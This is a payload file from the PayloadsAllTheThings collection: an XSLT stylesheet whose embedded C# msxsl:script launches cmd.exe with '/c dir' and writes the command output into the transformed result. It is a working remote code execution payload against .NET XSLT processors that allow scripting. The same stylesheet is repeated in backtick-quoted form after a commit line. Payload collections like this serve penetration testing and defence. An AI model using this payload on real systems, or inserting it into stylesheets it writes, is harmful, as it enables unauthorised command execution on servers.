PayloadsAllTheThings/XSLT Injection/Files/rce-dotnet-2.xsl

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="urn:my-scripts">

<msxsl:script language = "C#" implements-prefix = "user">
<![CDATA[
public string execute(){
System.Diagnostics.Process proc = new System.Diagnostics.Process();
proc.StartInfo.FileName= "C:\\windows\\system32\\cmd.exe";
proc.StartInfo.RedirectStandardOutput = true;
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.Arguments = "/c dir";
proc.Start();
proc.WaitForExit();
return proc.StandardOutput.ReadToEnd();
}
]]>
</msxsl:script>

  <xsl:template match="/fruits">
  --- BEGIN COMMAND OUTPUT ---
	<xsl:value-of select="user:execute()"/>
  --- END COMMAND OUTPUT ---	
  </xsl:template>
</xsl:stylesheet>
XSLT payloads + Headless Browser 2024-05-30 22:07:21 +00:00			`<?xml version="1.0" encoding="UTF-8"?>`
			`<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"`
			`xmlns:msxsl="urn:schemas-microsoft-com:xslt"`
			`xmlns:user="urn:my-scripts">`

			`<msxsl:script language = "C#" implements-prefix = "user">`
			`<![CDATA[`
			`public string execute(){`
			`System.Diagnostics.Process proc = new System.Diagnostics.Process();`
			`proc.StartInfo.FileName= "C:\\windows\\system32\\cmd.exe";`
			`proc.StartInfo.RedirectStandardOutput = true;`
			`proc.StartInfo.UseShellExecute = false;`
			`proc.StartInfo.Arguments = "/c dir";`
			`proc.Start();`
			`proc.WaitForExit();`
			`return proc.StandardOutput.ReadToEnd();`
			`}`
			`]]>`
			`</msxsl:script>`

			`<xsl:template match="/fruits">`
			`--- BEGIN COMMAND OUTPUT ---`
			`<xsl:value-of select="user:execute()"/>`
			`--- END COMMAND OUTPUT ---`
			`</xsl:template>`
			`</xsl:stylesheet>`